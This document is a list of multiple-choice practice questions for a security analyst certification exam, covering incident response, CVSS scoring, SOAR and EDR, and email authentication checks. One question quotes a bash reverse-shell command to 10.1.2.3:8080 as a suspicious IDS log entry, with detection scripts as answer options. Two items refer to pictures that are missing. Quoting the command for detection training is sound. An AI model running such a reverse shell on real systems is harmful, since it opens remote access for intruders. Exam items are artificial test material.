An analyst examines events in multiple systems but has difficulty correlating data points. Which of the following is most likely the issue with the system? Access rights Network segmentation Time synchronization Invalid playbook.
An analyst recommends that an EDR agent collect the source IP address, connect to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is best to help the analyst implement this recommendation? SOAR SIEM SLA IoC.
An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery controlled by a PC, which is utilizing the OS approaching the end-of-life date. Which of the following best describes a security analyst’s concern? Any discovered vulnerabilities will not be remediated. An outage of machinery would cost the organization money. Support will not be available for the critical machinery. There are no compensating controls in place for the OS.
Which of the following describes the best reason for conducting a root cause analysis? The root cause analysis ensures that proper timelines are documented. The root cause analysis allows the incident to be properly documented for reporting. The root cause analysis develops recommendations to improve the process. The root cause analysis identifies the contributing items that facilitated the event.
Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system, an example of? Command and Control Data Enrichment Automation Single Sign-On.
A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device’s operating system. Which of the following best meets this requirement? SIEM CASB SOAR EDR.
A security analyst identified the following suspicious entry on the host-based IDS logs:
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing? #!/bin/bash
nc 10.1.2.3 8080 -vv >dev/null && echo "Malicious activity" || echo "OK" #!/bin/bash
ps -fea | grep 8080 >dev/null && echo "Malicious activity" || echo "OK" #!/bin/bash
ls /opt/tcp/10.1.2.3/8080 >dev/null && echo "Malicious activity" || echo "OK" #!/bin/bash
netstat -antp | grep 8080 >dev/null && echo "Malicious activity" || echo "OK".
A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network? Implement segmentation with ACLs. Configure logging and monitoring to the SIEM. Deploy MFA to cloud storage locations. Roll out an IDS.
A security analyst is reviewing the findings of the latest vulnerability report for a company’s web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure? Deploy a WAF to the front of the application. Replace the current MD5 with SHA-256. Deploy an antivirus application on the hosting system. Replace the MD5 with digital signatures.
A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the following should the analyst do first? Conduct security awareness training on the risks of using unknown and unencrypted USBs. Write a removable media policy that explains that USBs cannot be connected to a company asset. Check configurations to determine whether USB ports are enabled on company assets. Review logs to see whether this exploitable vulnerability has already impacted the company.
A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior? Nmap TCPDump SIEM EDR.
A security analyst is validating a particular finding reported in a web application vulnerability scan to ensure it is not a false positive. The security analyst uses the snippet below (Picture).
Which of the following vulnerability types is the security analyst validating? Directory Traversal XSS XXE SSRF.
Which of the following is the most important factor to ensure accurate incident response reporting? A well-defined timeline of the events. A guideline for regulatory reporting. Logs from the impacted system. A well-developed executive summary.
A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following commands should the security analyst consider running? grep [IP address] packets.pcap cat packets.pcap | grep [IP Address] tcpdump -n -r packets.pcap host [IP address] strings packets.pcap | grep [IP Address].
A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar CVSSv3 scores but different base score metrics. Which of the following attack vectors should the analyst remediate first? CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H.
A security analyst must review a suspicious email to determine its legitimacy. Which of the following should be performed? (Choose two.) Evaluate scoring fields, such as Spam Confidence Level and Bulk Complaint Level. Review the headers from the forwarded email. Examine the recipient address field. Review the Content-Type header. Evaluate the HELO or EHLO string of the connecting email server. Examine the SPF, DKIM, and DMARC fields from the original email.
A vulnerability analyst receives a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS3.1 base scores? AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L - Base Score 6.0 AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:L - Base Score 7.2 AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H - Base Score 6.4 AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5.
A recent vulnerability scan resulted in an abnormally large number of critical and high findings that require patching. The SLA requires that the findings be remediated within a specific amount of time. Which of the following is the best approach to ensure all vulnerabilities are patched in accordance with the SLA? Integrate an IT service delivery ticketing system to track remediation and closure. Create a compensating control item until the system can be fully patched. Accept the risk and decommission current assets as end of-life. Request an exception and manually patch each system.
Which of the following would help an analyst quickly determine whether the IP address in an SIEM alert is a known malicious IP address? Join an information-sharing and analysis center specific to the company's industry. Upload threat intelligence to the IPS in STIX'TAXII format. Add data enrichment for IPs in the ingestion pipeline. Review threat feeds after viewing the SIEM alert.
An organization was compromised, and the usernames and passwords of all employees were leaked online. Which of the following best describes the remediation that could reduce the impact of this situation? Multifactor Authentication Password Changes System Hardening Password Encryption.
A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective? Deploy agents on all systems to perform the scans. Deploy a central scanner and perform non-credentialed scans. Deploy a cloud-based scanner and perform a network scan. Deploy a scanner sensor on every segment and perform credentialed scans.
An organization's email account was compromised by a bad actor. Given the following information (Picture):
Which of the following is the length of time the team took to detect the threat? 15 Minutes 20 Minutes 45 Minutes 2 Hours.
A security administrator needs to import PII data records from the production environment to the test environment for testing purposes. Which of the following would best protect data confidentiality? Data Masking Hashing Watermarking Encoding.
The email system administrator for an organization configured DKIM signing for all emails legitimately sent by the organization. Which of the following would most likely indicate an email is malicious if the company's domain name is used as both the sender and the recipient? The message fails a DMARC check. The sending IP address is the hosting provider. The signature does not meet corporate standards. The sender and reply address are different.
During an incident involving phishing, a security analyst needs to find the source of the malicious email. Which of the following techniques would provide the analyst with this information? Header Analysis Packet Capture SSL Inspection Reverse Engineering.
|
